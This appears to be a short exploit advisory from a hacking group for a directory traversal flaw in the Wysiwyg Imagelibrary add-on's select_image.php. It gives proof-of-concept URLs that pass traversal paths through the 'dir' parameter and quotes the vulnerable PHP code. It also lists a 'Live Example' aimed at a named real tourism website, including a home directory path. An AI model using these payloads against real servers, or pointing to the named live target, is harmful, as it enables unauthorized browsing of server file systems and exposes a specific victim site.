The Wysiwyg Imagelibrary add-on suffers from a directory traversal vulnerability in select_image.php.
f95d8cfa9bbf990cef1d2f8027dcd10b67902dbbb539bb26ac86b28d980af3a3
# Author : Geek
# Title : Wysiwyg Imagelibrary Addons (Folders Traversal)
# Date : Today :P
# Site : Sec4ever.com
# p0x :
{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=full path to public_html or httpdocs
{x} http://localhost/lol/wysiwyg/addons/imagelibrary/select_image.php?dir=..%2Fhome..%2Fuser..%2Fpublic_html
# Code :
$get_dir = isset($_GET['dir']) ? prepare_input($_GET['dir']) : "";
......
if($get_dir){
$dir = base64_decode($get_dir);
if(substr($dir, -1, 1)!='/') {
$dir = $dir . '/';
}
$dirok = true;
$dirnames = split('/', $dir);
for($di=0; $di<sizeof($dirnames); $di++) {
if($di<(sizeof($dirnames)-2)) {
$dotdotdir = $dotdotdir . $dirnames[$di] . '/';
}
}
if(substr($dir, 0, 1)=='/') {
$dirok = false;
}
if($dir == $leadon) {
$dirok = false;
}
if($dirok) {
$leadon = $dir;
}
}
$opendir = $leadon;
if(!$leadon) $opendir = '.';
if(!file_exists($opendir)) {
$opendir = '.';
$leadon = $startdir;
}
# Live Example :
{X} http://www.tourismhalong.com/includes/wysiwyg/addons/imagelibrary/select_image.php?dir=%2Fhome%2Ftouris8%2Fpublic_html
# Greet'z : b0x,Sec4ever,paulzz,The Sword,The Injector,B07 M4ST3R,Jago :P,LinuxAC,Cmos-CLR :P <3 And All Sec4ever VIP Members And Others :)